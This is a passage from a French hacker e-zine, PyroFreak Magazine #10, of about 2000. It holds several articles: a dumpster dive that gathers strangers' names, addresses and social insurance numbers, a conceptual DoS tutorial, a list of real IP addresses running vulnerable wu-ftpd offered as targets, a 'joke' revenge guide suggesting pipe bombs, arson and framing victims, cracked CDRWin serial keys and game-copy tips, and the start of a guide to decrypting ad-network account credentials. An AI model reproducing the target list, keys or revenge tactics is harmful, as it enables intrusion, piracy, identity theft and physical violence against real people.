ancïeux de savoir ce qu'on va trouver. Tekrebel ouvre le couvercle, j'entre
dans la poubelle, je prend le sac et on ce sauve en courrant :) On s'enva à
l'auto, tout le monde entre et Tekrebel nous attend avec le sac dans les
bras(euhh oui madame, c'est un projet de recherche écologique pour l'école
que nous fesons..). On arrive, il entre le sac dans le char et on DÉCRISS!!!
Arrivé au "spot" de déballage, tout le monde sors et on regarde voir ce qui
est bon ou pas. On reste pas trop longtemps la parce que c'est proche du
park
et la GRC comment vous savez, c'est eux la police du park de la gatineau et
ils passent souvent pour voir si le monde font des conneries.

Après avoir tout prit ce qui était bon, on a finallement arrêter au Tim
Horton
pour tout regarder concrètement ce qu'il y avait. Des noms, addresse, numéro
d'assurance social, quelques users mais pas de #cc :(


C'est ainsi que c'est terminé la soiré du 29 au 30*.

Si vous habitez en Outaouais et vous aimeriez nous joindre c'est possible
maintenant, on pourrait y aller une gange de personne j'ai un chum qui
voudrait venir et qui a une vanne de 11 places so on a en masse de place
pour du monde.

Simplement vous informer c'est quand le prochain Meeting et ou a une des
personnes suivantes :

endrix - System_exe - Tekrebel - Vip0|a - Kev0rkian - Neuro

Ou juste par email = lordendrix@hotmail.com
Via IRC = Undernet, #pyrofreak
Via HTTP = Http://www.pyrofreak.org


Je tiens aussi à remercier kev0rkian qui s'est offert cette fois pour
conduire... On va te remettre ca dude :)




endrix-(http://endrix.usuck.com)


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 19-DoS, wtfit (what the fuck is that)?
|( ) Phreak (X) Hack ( ) Autres
'.__________Par Tekrebel ________ tekrebel@vl.videotron.ca ______ ___


Introduction

Avec les événements des derniers mois, j'ai décidé d'écrire un petit
article pour expliquer en détails ce que sont les denial of service attacks et
la façon dont elles fonctionnent. Tout le monde a surement entendu parler des
sites Yahoo, CNN, Amazon, Buy.com et j'en passe, qui ont été victime d'un DoS.
Par exemple, Yahoo a reçu 1 gig/s de données à un moment donné, ce qui a
provoqué comme vous vous en doutez, la saturation complète de la bande passante.
Aucun usager ne pouvait se connecter au site.

Qu'est-ce qu'un DoS et pourquoi?

Comme le nom l'indique, un denial of service attack vise à empêcher un
serveur ou une machine d'offrir des services aux utilisateurs. On peut accomplir
ceci de plusieurs façons, entre autre en saturant la bande passante, en
exploitant un bug sur la machine et en la faisant "planter". Plusieurs logiciels
(communément appelés nukes) ou exploits nous permettent ceci. Exemple: teardrop,
land, winnuke, smurf, pawk, pimp, et bien d'autres. J'expliquerai le
fonctionnement général de ces programmes un peu plus tard. Le pourquoi des DoS
est assez évident pour les compagnies, spécialement les commerces électroniques.
Quand le serveur ne peut offrir de services, la compagnie pert de l'argent.
Prenons un petit scénario exagéré mais quand même plausible. Une compagnie X,
disons Pyro-Bay Inc., veut se lancer dans le commerce électronique, plus
précisément dans les enchères on-line. Malheureusement, le marché est
présentement occupé à 90% par son concurrent, EBay. Pyro-Bay décide donc
d'engager et de fournir le matériel et les connections nécessaires à un groupe
de hackers professionels. Ces hackers sont vraiment des pros et ne se feront pas
retracer. Les hackers ou crackers (appelez les comme vous voulez), procèdent
donc à l'implantation de distributed attack trojans sur plusieurs centaines de
machines sur une période de trois mois. Ensuite, ayant bien planifiés leur
attaque, ils donnent le signal aux machines infectées de flooder ebay.com avec
des paquets icmp, udp, tcp et autres. Ce qui suit est désastreux pour EBay, le
site est inaccessible aux clients pendant 2 semaines, les hackers étant très
bien préparés. Imaginez, l'argent que pert EBay pendant ces deux semaines. En
plus, Pyro-Bay décide de coordonner sa campagne de publicité massive en même
temps que les attaques. Coincidence? :) Avec les protocoles et l'architecture
d'internet actuelle, toute compagnie ou organisation possédant la motivation et
les ressources nécessaires, peut faire tomber à peu près n'importe quel site
indéfiniment. Le FBI vous dira qu'ils ont développé plein de techniques pour
retracer les auteurs de ces attaques, c'est seulement vrai dans la mesure où les
attaquants commettent des erreurs stupides et ne sont pas professionels.
L'internet est une cible de choix pour ce type d'attaque, plus facile à
effectuer en général que hacker un serveur.

Quels sont les types de DoS?

Je vais tenter de faire un résumé des principaux types de DoS. On les
regroupe en deux catégories d'habitude: les DoS locaux ou remote (externe).
C'est-à-dire, dans le cas d'un remote, le DoS s'effectue à partir d'un
ordinateur externe au réseau. Dans le cas de celui local, il s'effectue sur le
serveur comme tel, avec un compte sur la machine habituellement.

Attaques à distance (remote)

- ICMP flood

C'est un des types de DoS les plus facile à exécuter, il s'agit seulement
d'avoir une connection internet plus rapide que celle de la victime. ICMP
(internet control message protocol), est un protocole de communication utilisé
pour le diagnostic des erreurs et ne requiert pas de connection. Dans ce type
d'attaque, on forge des paquets avec une adresse source différente (ou au
hasard) et on les envoit à notre cible. En saturant la cible avec des paquets de
64k ou une multitude de plus petits paquets, la machine à l'autre bout ne peut
plus répondre aux demandes de connections légitimes des utilisateurs ou clients
parce que toute la bande passante est utilisée. On utilise la plupart du temps
un paquet ICMP de type echo-request (ping) parce que le serveur qui reçoit ce
paquet doit y répondre avec un echo-reply (pong). Il est possible de diminuer
l'impact en deux de cette attaque en configuration un firewall pour bloquer les
paquets ping mais certains services de diagnostics peuvent être affectés et si
l'attaquant possède plus bandwidth, la machine est encore saturée. Il existe une
variante très puissante à cette attaque, il s'agit du smurf. Non, ce n'est pas
une attaque de petits bonhommes bleus. En fait, pour résumer rapidement, avec le
smurf, on génère beaucoup plus de traffic que notre connection le permet. Le
smurf se base sur le fait que certains routeurs sont mal configurés et répondent
à un ping par un nombre de pong égal au nombre de machines dans le subnet. Par
exemple, si on a un routeur avec 50 machines derrière celui-ci, avec disons un
bandwidth illimité et qu'on envoit pour 100k/s de ping, le routeur répondra avec
50x100k/s de pong, c'est à dire 5 meg/s. Une T1 ou un câble modem tombe
facilement devant ce type d'attaque. C'est ce type de DoS qui a été employé
contre Yahoo, combiné avec un DDoS (Distributed Denial of Service). Les flood
d'ICMPs sont assez difficiles à retracer puisque l'adresse source des paquets
est forgée.

- SYN flood

Avant d'expliquer le SYN flood, il faut expliquer la base d'une connection
TCP. Quand on initie une connection en TCP, on envoit un paquet SYN au serveur,
qui lui nous répond avec un ACK et nous par un SYN/ACK ensuite. C'est ce qu'on
appele le 3way handshake. Le problème se situe dans le fait qu'un serveur va
attendre le SYN/ACK un certains nombre de secondes avant de libérer le socket.
En falsifiant l'addresse source de notre paquet SYN, on peut envoyer quelques
dizaines de paquets forgés et remplir la queue de connection de la victime.
Celle-ci ne peut donc plus accepter d'autres connections avant que la queue soit
vide. Le nombre de connections et le temps d'attenre avant un reset varie d'un
serveur à un autre mais la queue n'est jamais très longue (entre 10 et 20
environ). Alors, on n'a pas besoin d'avoir beaucoup de bandwidth pour effectuer
cette attaque puisqu'il faut juste envoyer une vingtaine de paquets à un
intervalle correspondant au temps d'attente avant un reset de la connection.
Plusieurs fournisseurs Internet ont été victime de ce type d'attaque, en
particulier Panix.com qui a été hors d'usage pendant 2 semaines suite à un SYN
flood.

- Les "nukes"

Tout le monde doit connaître le célèbre programme winnuke, qui fait (ou
plutôt qui faisait) planter les machines windows. Envoyer un nuke consiste à
envoyer un certains types de paquet, qui est mal géré par le système
d'exploitation et qui fait planter celui-ci. Ce type d'attaque exploite donc un
bug dans le OS. C'est pour cette raison que d'habitude, ce type de DoS ne
fonctionne pas très longtemps parce que des patchs sont émis assez rapidement.
Des exemples de nukes: teardrop, land, igmp.

- Les bugs dans les programmes

On peut également faire planter seulement certains services sur des ports
si ceux-ci comportent des bugs, des buffer overflow notamment. Dans le cas d'un
buffer overflow, on se connecte sur un des ports et on envoit plein de
caractères, ce qui fait déborder le buffer et planter le programme. Il est
également possible d'exécuter des commandes au niveau root avec un buffer
overflow mais c'est une autre histoire. Par exemple, il y a un bug dans une
version de war-ftp qui fait que quand on entre un username de plus de 255
caractère, war-ftp plante. Une autre variante de ce type d'attaque mais au
niveau hardware se retrouve chez les vieux modems où en envoyant un ping avec
ath+++ et un paramètre demandant à la victime de retourner le pong avec
l'information contenue dans celui-ci, cause la déconnection du modem. ath+++ est
la commande utilisée pour se déconnecter avec un modem. Vous voyez le principe?
On peut faire déconnecter n'importe qui qui a ce type de vieux modem. Il y a une
liste quasi illimitée de ce type de bugs, regardez à
http://www.attrition.org/security/denial/

Attaques locales

- Les forks

Plutôt reconnu sur les plateformes UNIX, ce DoS consiste à créer une
multitude de process sur la machine afin de consumer toutes les ressources
disponibles et ralentir l'ordinateur. Un bon forker, tel superforker, empêche
même l'admin de liste le contenu d'un répertoire ou d'exécuter n'importe quelle
commande de base. La parade à ce type d'attaque est relativement simple, il
s'agit de limiter les usagers du serveur à un certain nombre de process.
D'habitude, un usager normal ne devrait jamais dépasser une centaine de process
à la fois.

- L'espace du disque dur

Cette attaque peut également s'effectuer à distance, avec des cgi-bin
scripts qui écrivent sur le disque dur par exemple. C'est très simple, il s'agit
de remplir le disque dur de notre ennemi avec plein de cochonneries. Bien que
l'administrateur peut mettre des quotas sur les usagers, certains bugs dans des
programmes roulant en UID0 ou au niveau admin permettent d'exploiter cette
faiblesse. Il faut aussi se souvenir que la plupart des systèmes de fichiers, si
non tous, utilise un certain minimum d'espace sur le disque pour stocker
n'importe quel fichier. Par exemple, sur Linux, la grosseur d'un inode par
défaut est 4096 bytes si je me rappele bien. Alors, si nous créons 1000 petits
fichiers de 1 byte de long, ils utiliseront quand même 1000 x 4096 bytes, c'est-
à-dire 4,096,000 bytes. Ceci permet de remplir un gros disque assez rapidement
puisque l'on a pas à écrire quelques gigs pour remplir un disque de 20 gigs. Le
programmes mal configurés qui log (comme les firewalls), sont souvent la cause
d'un remplissage de disque quand un attaquant provoque délibérément des messages
d'erreurs afin de remplir un disque.

Conclusion

Bon, j'espère que cet article vous a plu sinon too bad, vous venez juste
de waster 5 minutes de votre vie. Je crois que j'ai fait le tour des DoS dont on
entend le plus parler. Restez à l'écoute des nouveaux DoS car ils en sort à la
tonne alors si vous avez un serveur connecté à Internet, il serait bon de
vérifier si votre machine est bien configurée pour éliminer ce type d'attaque.
Je n'ai pas parlé de chaque DoS en particulier parce que sinon on serait encore
là dans 3 semaines alors ne venez pas me bugger que je n'ai pas parlé de winnuke
version 2.4 lamer edition.

____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 20-Initiation au C sous linux
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Putois ____ ________ asmbeginer@multimania.com ______ ___

1] Comment faire des programmes du type: myprog hello

On vois beaucoup sur le web des programmes C,avec plusieur options par
exemple les scanners de ports ou la syntaxe est: portscan <host> <port>:


#include <stdio.h>

void main(int argc,char *argv[])
{
int test;

if (argc < 2 )
{
printf("usage: exemple test",argv[0]);
exit(-1);
}

if (!(test))
{
printf("this ok");
exit(-1);
}
}


Cette ligne if (!(test)) demande au compilateur de retourner sous le shell
et de voir si on a taper la commande test . A noter que chaque fonctions
que l'on veut rajouter doit être initialiser par un type INT au debut du
code. Compilation:cc -o exemp exemp.c

Execution: bash#> ./exemp test

if (!(test))
{
printf("this ok");
exit(-1);
}

Un autre exemple:


#include <stdio.h>

void main(int argc,char *argv[])
{
int test;
int test2;
int test3;

if (argc < 2 )
{
printf("usage: exemple test",argv[0]);
exit(-1);
}

if (!(test))
{
printf("this ok");
exit(-1);
}

if (!(test2))
{
printf("test 2 this ok");
exit(-1);
}

if (!(test3))
{
printf("test 3 this ok");
exit(-1);
}
}

Compilation:cc -o exemple2 exemple2.c

Usage: ./exemple2 test marquera this ok a l'ecran
Usage: ./exemple2 test2 marquera test2 this ok a l'ecran
Usage: ./exemple2 test3 marquera test3 this ok a l'ecran

1.2] Les branchements sélectifs avec SWITCH
Le but de la fonction Switch est de permettre de travailler avec plusieurs
fonctions Void.
Principe:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


main(){
}

void essai()
{
}

void test()
{
}

Programme qui ne sert à rien sauf qu'a démontrer l'algorythme simple pour
créér ses propres VOID.
Afin de pouvoir appeller la sous fonction essai() le SWITCH doit etre créé
à l'intérieur de main():

main(){
char c;

switch(c){
default: fprintf(stderr,"Usage: -a -b\n");
exit(2);
}

}

A son éxécution ce programme marquera: Usage: -a -b,le but de cet exemple
et de faire un code de type:
./exemple3 -a .La sous fonction essai() doit être initialiser au début du
source avant la fonction main()
Le programme se transforme donc comme ceci:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void essai();

main(){
char c;

switch(c){

case 'a' : essai(); /*appel dela fonction essai()/*
break;

default: fprintf(stderr,"Usage: -a -b\n");
exit(2);
}
}

void essai()

{

}


void test()
{
}




2] Une tentative pour simplifier la commande chmod

L'idéal serait de créer un programme avec divers fonctions pour simplifier
la lourd commande CHMOD
L'exemple 4 nous démontre comment utiliser la programmation des i-noeud,
il créér un répertoir /test dans le directory courant:

#include <sys/types.h>
#include <sys/stat.h>
main(){

mode_t mode;
mode = S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP|S_IRGRP|S_IROTH|S_IXOTH;
if(mkdir("test",mode) == -1);
perror("Creation:");
}

Compilation: cc -o exemple3 exemple3.c,donc le repertoire /test est créér,
un message de réussite est renvoyé automatiquement par linux./test est
également accessible par n'importe quel utilisateur. On peut le vérifier
avec la commande ls -l,exemple3 a fait un chmod r+w+x+x+r+r+x /test.

____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 21-sCAN pAR eNDRIX
|( ) Phreak (X) Hack ( ) Autres
'.__________Par Endrix________ ________ fbasoft@yahoo.com ______ ___


Unix FTP Server wu-2.4.2-acadam
Beta 15, Beta 18

Outil n'cessaire, wuftpd exploit.

amusez-vous :)

24.218.255.191:21: 220 daniel.hawke.org FTP server (Version
wu-2.4.2-academ[BETA
24.200.0.153:21: 220 Panthere FTP server (Version
wu-2.4.2-academ[BETA-15](1) Sa
24.200.11.90:21: 220 steph.excalior.net FTP server (Version
wu-2.4.2-academ[BETA
24.200.14.55:21: 220 linux1.sillyweb.sil FTP server (Version
wu-2.4.2-academ[BET
24.200.22.251:21: 220 pluton.imtel.com FTP server (Version
wu-2.4.2-academ[BETA-
24.200.25.174:21: 220 dimsboiv.maison FTP server (Version
wu-2.4.2-academ[BETA-
24.200.61.96:21: 220 localhost FTP server (Version
wu-2.4.2-academ[BETA-18](1) M
24.200.61.192:21: 220 ysidea.dyndns.org FTP server (Version
wu-2.4.2-academ[BETA
24.200.68.144:21: 220 modemcable144.68-200-24.mtl.mc.videotron.net FTP
server (Version wu-2.4.2-academ[BETA-15]
24.200.69.139:21: 220 kostanza.dyn.ml.org FTP server (Version
wu-2.4.2-academ[BE
24.200.71.167:21: 220 server FTP server (Version wu-2.4.2-VR17(1)
24.200.73.131:21: 220 tw.fdns.net FTP server (Version wu-2.5.0(1) Tue Sep 21
16:
24.200.74.56:21: 220 gilker FTP server (Version wu-2.4.2-academ[BETA-18](1)
Mon
24.200.76.168:21: 220 Serveur1.videotron.ca FTP server (Version
wu-2.4.2-academ[
24.200.78.151:21: 220 master FTP SERVER (Version wu-2.4.2-academ[BETA-18]
24.200.83.196:21: 220 demi.dhs.org FTP server (Version wu-2.6.0(1) Thu Oct
21 12
24.200.85.59:21: 220 moose.nodomain.nowhere FTP server (Version
wu-2.4.2-VR17(1)
24.200.89.40:21: 220 DB-Srv.cognat.com FTP server (Version
wu-2.4.2-academ[BETA-
24.200.94.5:21: 220 caribou.dyns.cx FTP server (Version wu-2.4.2-VR17(1) Mon
Apr
24.200.99.160:21: 220 peter FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19
09:2
24.200.100.113:21: 220 merlin FTP server (Version wu-2.4.2-VR17(1) Mon Apr
19 09
24.200.101.174:21: 220 localhost FTP server (Version wu-2.4.2-VR17(1) Mon
Apr 19
24.200.102.10:21: 220 tower.imperators.com FTP server (Version
wu-2.4.2-academ[B
24.200.104.117:21: 220 stas.fulcrum.net FTP server (Version wu-2.4.2-VR17(1)
Mon


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 22-Faire chier un trou du cul à la éleet
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Tekrebel ________ tekrebel@vl.videotron.ca ______ ___


Hey les dudes, vous voulez vraiment faire chier quelqu'un parce
qu'il vous a nické votre blonde, ou a rit de vous sur #outaouais ou
#montreal? Ou encore ce nerd à la con à votre école qui se vante d'utiliser
netbus et d'avoir hacker le fbi? Et bien lisez ce qui suit, c'est dans
votre intérêt, vous serez une techno-terreur, un cyber thug, une super
menace après avoir apris tout ce qui trouve dans cet article. Les combat à
mains nues dans la vrai vie c'est pour les nuls, le cyberespace et le monde
de l'électron ça c'est comme dirait un gars dans IGA, le cyber bronx. Assez
de bavardage et passons tout de suite au briefing.

Un petit avant goût de destruction, les floods

Tout les cools de l'internet savent ce qu'est un flood, une
inondation comme on dit en bon français. T'as qu'à te hacker une oc3 et tu
pète la gueule au bandwidth de ton ennemi les deux doigts dans le nez en
criant ciseaux. Et si le mec est du genre dur à cuir "j'ai un modem câble
et je download du porn . 500k/s en me shaftant" et bien là tu lui balance
un smurf, ça devrait suffire pour lui donner une frousse bleue et le
convaincre de ne plus venir embêter ta cyber nana.

Attention aux radiations, les nukes

Ouaaisss... les nukes, l'arme absolue des vrai destructeurs.
À manipuler avec soin si on ne veux pas se taper un leak de plutonium dans
son ordi. Seuls les vrais pros du cyber fighting savent se servir de ces
petits joujous . l'apparence innofensive. Cet emmerdeur d'irc cop va en
manger toute une. OOB, Teardrop, un petit land combiné avec un double igmp
et pif, ce petit aoleur vient de se retrouver triple KO. Encore une victoire
pour coolhacker14, maitre incontesté des armes nucléaires et biochimiques
de l'internet.

Pour les opérations un peu plus délicates

Bon, le mec s'est tapé un firewall, ou un coupe-feu bastion comme
disent les mecs de z télé. T'affole pas, ce putain d'enfouaré n'est pas à
l'abri. Parfois mieux vaut être sérieux et éviter des ennuis en y allant de
la vrai manière éleet, le social engineering et les petits crosses
électroniques. Ouais et bien le con il est sur Vidéotron ou tout autre isp à ip
statique? Pas de problème, crache quelques port scan forgés avec son ip sur
les serveurs de son isp et sur toi même. Ensuite, fait comme les trouillards
et envoit un petit courriel . Bill "le couch fucker", admin de Vidéosuce.
Et hop! En moins de deux, le mec se fait couper sa connection et devra
s'expliquer avec ses parents qui auront reçu un petit appel d'plaisant de
notre cher Bill.

Cette section s'adresse aux super commandos masqués

Attention, seuls les vrais killers, prêts . risquer le tout pour le tout
doivent lire ce qui suit! Quand il s'agit de de venger contre un vrai con,
vraiment dans le genre siphoneur de sphyncteur ou encore rectum rider, il faut
procéder de la manière expéditive et efficace: couper la ligne manuellement.
Haha, l'idiot ne se doûte surement pas qu'avec tes talents de uberhacker,
tu t'es tapé son dossiers sur son ip. Bon, tu attend que tes parents aient
fini d''couter le petit tracteur des arpents verts ou tout autre émission
pour vieux débile, et tu te trimbale jusque chez le dude. Les vrais elites
grimpent aux poteaux d'hydro et largue une pipe bomb dans la boite mais bon,
si le mec vit dans ce quartier riche aux maisons de 200 000 et aux lignes
souterraines et bien tu peux toujours faire chier bell et le gars en ouvrant
ces petits boites brunes et en foutant le feu dedans. Et juste avant de
partir, tu lui slash ses tires.

Et bien, ceci conclu un autre merveilleux article du seul vrai
hacker, le maitre du côté obscur et gardien de la citadèle de Delroth, j'ai
nommé, moi-même, tekrebel. Alors amusez vous bien avec ces techniques et
souvenez vous: les nukeurs seront un jour les maitres de l'internet et les
faibles seront flanqués avec les trous du cul de AOL.

P.S.: Au cas où vous étiez trop cons, cet article est une joke et la qualité
du français est intentionellement laissée de côté. Nuke on!



____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 23-Exploit altavista et Cash bar!
|( ) Phreak (X) Hack ( ) Autres
'.__________Par cyberrider________ ________ cyberride@hotmail.com ___
A.K.A DeREkTom


Salut tous, dernièrement jai fait 2 progs pour vous aider à crosser
altavista et Cash Bar ! Dans l'article qui va suivre, je vais vous expliquer
le fonctionnement de c'est 2 programmes (Aller voir sur le site de PyroFreak
dans les progz "Www.PyroFreak.Org" pour vous les procurés).
-total3.exe
-adshelp.exe


Commençons par le total3.exe qui est total liberty 3.0 , il sert à
cacher la bar de altavista quand l'on surf! Il est tout simple, mais j'ai
mit un numéro de série , je sais pas pourquoi mais bon!

Ouvrez le programme, il vous copie collera le numéro de série directement
dans le clipboard, donc vous n'avez qu'à me le ctrl + v dans icq (1322337).
Ensuite que je vous aurez envoyé le petit serial, vous n'avez qu'à le
rentrer après le OK.


Il va y avoir une petite bar de text qui va apparaître, tapper le serial et
le programme va maintenant fonctionner!

Comment s'en servir!

C'est assez simple! Alors vous êtes offline! vous clicker sur connect le
programme va vous connecter automatiquement et va fermer la bar! oui oui
la fermer! Vous pourrez rester online tout le temps sans que la banner
refresh le timer le click toute!


Pour vous déconnecter, aller vous déconnecter normallement sur la systray
sur le petit modem et ensuite sur le programme ou l'un avant l'autre, ca pas
d'importance, mais il faut faire les 2! ;)

C'est assez simple et pratique comme programme. Il fait tous à votre place!!
enjoy this soft by CyberRider!

Ensuite pour mon autre programme (adshelp.exe) faite autant à la press que
cet article, il est simple d'usage poser votre curseur devant l'object ou
la fenetre desiré, regarder le handle et retener le dans votre tete
(pourquoi le prog le retien pas ? bin pour que vous vous pensiez hacker:))
Ensuite vous aller dans le menu et selectionner le mode que vous voulez kill
hide capsulate hide! Normalement capsulate hide est capable de cacher
n'importe koi!! Cela depend des programmes ou de l'endroit que vous clicker ;))

Wow déjà fini cet article à la butch, j'espère que vous aller apreciez mes
2 petits softs!


Question normallement posées:

Pourquoi quand je me connect sur altavista sa dit qu'il est deja laoder?
C'est parce que tu t'est mal d‚connecter! click sur disconnect dans le prog
avant!

Pourquoi quand je fait capsulate hide sa marche pas?
Tu clcik mal ou bien que le prog neccessite un bon cracker ;)

D'autres questions:

cyberride@hotmail.com
icq : 1322337
sur irc : DerekTom

Pour les serials, contactez moi sur irc "derektom" ou sur icq "1322337".

Merci
CyberRider A.K.A DerekTom


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 24-ISOm \\'aReZ & MP3 (Partie 3)
|( ) Phreak ( ) Hack (X) Autres
'._______Par Vip0|a ____________________ ______ vipola@pyrofreak.org ___



Voici une suite de mes précédants arcticles..
j'avais d'autres notions à vous enseigné donc
je ne vous avais parlé dans les 2 parties précédantes.

OverBurn:
¯¯¯¯¯¯¯¯¯
Overburn, signifie Graver plus loin'. Ce qui signifie que l'on
pourrait, en pratique, gravé plus de 74 minute sur un Cd de 74 minutes.
Non, pas beaucoup, mais lorsque vous avez du ISO de 74m30s ou de 75min,
le procédé de l'overburnage peut vous éviter de devoire utiliser un cd
de 80 minutes (plus coûteux que les cd Habituel de 74 min.)

Est-ce que tout le monde peuvent Overburner? la réponse est malheureu-
sement 'non'. Pour overburner, il vous faut réunire 3 éléments.

1) Un logiciel qui accepte l'Overburn..
Ne pensez pas overburner avec Adaptec Eazy CD creator, il refusera,
pensant bien faire, en prétendant que le CD est trop petit pour contenir
les informations que vous voulez y mettre, il a théoriquement raison.
Si vous désirez overburner, vous devrez vous servire d'unl ogiciel un
peut moin friendly. Dans mon cas, je me sert de CDr-Win 3.7f.

2) Vous devez vous servire de CDs dont la zone de gravure est
théoriquement légèrement plus grande que 74 minute..
Les maxell fonctionne très bien selon moi, mais il y en a surement
plusieur autres.

3) Il vous faut un graveur acceptant de gravé plsu loin de 74 min..
Ce n'est pas tout les graveurs qui accepte de gravé plus loin que 74
minutes.

Comment savoir si votre graveur accepte l'overburning? Testez est le seul
moyen. Trouvez vous un Iso dont la taille est 'LÉGÈREMENT' plus longue
que 74 min. (Prenez par exemple, le 4e CD de Final Fantazy 8). Si vous
réussissez à le gravé adéquatement et que le résultat est une réussite.
Cela signifiera donc que votre Graveur Peut Overburner.

CDr-Win version 3.8a:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Oui, la version 3.8a de CDr-win est sortie, mais je n'ai pas entendu de
très bon commentaire à son propos. si votre 3.7f fonctionne corectement,
je vous sugère de continuer a vous en servire =)

Serial Protect de CDr-win:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Comme vous l'avez sans doute remarquer, CDr-win est protégé à l'aide d'un
serial Number. Mais saviez vous que lorsque vous entrez un movais s/n,
Cdr-win va l'accepté, mais fera délibérément manquer vos Cds? Alors si
vous avez de sérieux problème de CDs, essayez donc de le réinstaller.

Voici une liste de s/n valide pour diverse version de CDr-win:

CDr-Win v3.4b
Name: pyrofreak
Company: pyrofreak
KeyCode: 0c9bba46-7c2a120e-fbd0f925-fdb3b3fd
Chek Code: f12809bb-70b1a848-87faeb2b-06634ad8
CDr-Win v3.5a
Name: pyrofreak
Company: pyrofreak
KeyCode: 0C9BA8FA-7C2A120E-2336F92E-FDB3B3FD
Chek Code: F1281B07-70B1BAF4-5F1CEB20-DE854AD3
CDr-Win v3.7a
Name: pyrofreak
Company: pyrofreak
KeyCode: 0C9BED9D-7C2A120E-4D29F915-FDB3B3FD
Chek Code: F1285E60-70B1FF93-3103EB1B-B09A4AE8
CDr-Win v3.7b
Name: pyrofreak
Company: pyrofreak
KeyCode: 0C9BED9D-7C2A120E-4D29F914-FDB3B3FD
Chek Code: F1285E60-70B1FF93-3103EB1A-B09A4AE9
CDr-Win v3.7c
Name: pyrofreak
Company: pyrofreak
KeyCode: 0C9B15F4-600893EB-4D29F902-FDB3B3FD
Chek Code: F128A609-6C93861F-2D216AE9-B09A4AFF
CDr-Win v3.7E
Name: pyrofreak
Company: pyrofreak
KeyCode: C9BED9D-7C2A120E-4D29F919-FDB3B3FD
Chek Code: F1285E60-70B1FF93-3103EB17-B09A4AE4
CDr-Win vg3.7f
Name: pyrofreak
Company: pyrofreak
KeyCode: C9BED9D-7C2A120E-4D29F91F-FDB3B3FD
Chek Code: F1285E60-70B1FF93-3103EB11-B09A4AE2
CDr-Win v3.8a
Name: pyrofreak
Company: pyrofreak
KeyCode: B88F057E-F97FB637-4D29F90B-FDB3B3FD
Chek Code: 453CB683-41F0B349-B4564F3C-B09A4AF6

Bootable CDs:
¯¯¯¯¯¯¯¯¯¯¯¯¯
Un CD boutable, vous connaissez? Si vous avez déja essayé linux, vous
devez savoire de quoi je parle, Un cd Bootable est l'équibalent d'une
disquette de démarrage, mais sur un CD. Pour se servire d'un Cd bootable,
vous devez allé dans le BIOS de votre Machine et modifier la valeur vis-à-vis
'Booting Order' qui est probablement 'A,C'. Modifiez le pour "Cd-rom,C". Cela
fera que lorsque vous ouvrez votre ordinateur, il essera dabord de booté sur
le CD dans votre CD-rom. si le Cd présent dans le Cd-rom n'est pas un Cd
bootable, ou qu'aucun Cd n'est présent dans le lecteur CD, il bootera
simplement sur votre disqueDure C.

L'utilité de Booté sur un CD?
Pour linux par exemple, le Cd d'installation est un Cd boutable servant à
formaté et installé linux sur votre disque dure (Qui est probablement formaté
en DOS). Une autre utilisation est celle de restorer votre Hd avec un backup
en cas de malchance. Vous bootez sur le Cd et formatez votre disque, puis
copier une image précédamment fait de votre disque Dure. Ce principe évite
de devoir toujour tout réinstallé manuellement à chaque formattage. Si vous
usez un peut de votre imagination, je suis certain que vous en trouverez une
tonne d'autre utilités.

Vous pouvez créé un Cd boutable à l'aide du logiciel Adaptec Eazy Cd creator 4..

Dans l'arboressance du Cd en bas.. cliquer la où c'Est écrit le nom de volume
du cd que vous allé créé, cliquez dessus avec le bouton droit, Allez sur
'New, Bootable CD' Eazy CD Creator va vous demandé d'inséré une disquette de
démarage dans Votre lecteur A, pour qu'il puisse allé y cherché les command.com
et compagnie.

Jitter Error de CDr-win:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
L'autre jour, j'ai essayé de gravé un cd à l'aide de CDr-win 3.7f, à ma grande
surprise, à chaque tantative de création de l'image du Cd sur mon Hd, le logiciel
me donnais une erreur: "Jitter Error" J'ai essayé plusieur fois de changer les
différants options, sans résultat. J'ai finalement réussit ma copie avec facilité
à l'aide du CD copier de Adaptec Eazy Cd creator 4. Les CDs qui me causent se
problème sont les suivant: RailRoad Tycoon, RainBow Six. Si vous savez comment
les copier avec CDr-Win, Envoyez moi un Email. Mais d'après moi, il s'agit
d'une protection sur le CD. Je vous tiendrai au courant si j'ai des nouvelle
sur le sujet.

Protectoin des CDs:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Votre ami vous a prèté son super jeu pour le Week-end et vous désirez vous en
faire une copie. Je vous suggère donc le site: http://www.gamecopyworld.com/
Vous y sélectionnez le jeu que vousdésirez copier et vous avez tout les
information nécéssaire sur la copy de cd Jeu. Plutôt pratique comme site =)


J'achève donc cette 3e Partie de 'ISO \\'aReZ & MP3' en vous souhaitant bonne chance
avec tout ce que je vous ai parlé dans cette arcticle et si vous avez des question
ou des commentaire à me posé à propos du gravage des CDs ou tout autres sujet que
j'ai abordé dans cette suite d'arcticles, n'ésitez pas! E-mailez moi =)

Vip0|a -=--> Vipola@pyrofreak.org


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 25-Decryptage des comptes de Cashsurfers
|( ) Phreak (X) Hack ( ) Autres
'.__________Par zorgon________ _______zorgon@sdf.lonestar.org ____ ___


Vous connaissez certainement le systeme de baniere publicitaire
qui s'affiche sur votre bureau en echange de quoi,
vous gagnez de l'argent tout en surfant. Pour ca, il faut creer
un compte sur un serveur. Ce compte vous permet de verifier
votre nombre de points, de modifier les renseignements de
votre compte ...

Il existe un serveur particulierement interessant qui est
Cashsurfers (http://www.cashsurfers.com). Vous creez un compte
chez eux et en retour il vous propose de downloader une
banniere que vous installerez.Rien de plus banal.

Mais c'est la que ca devient interessant. Allez dans le
repertoire d'installation, vous trouverez un
config.ini ou le username et le passwd sont cryptes, et le probleme
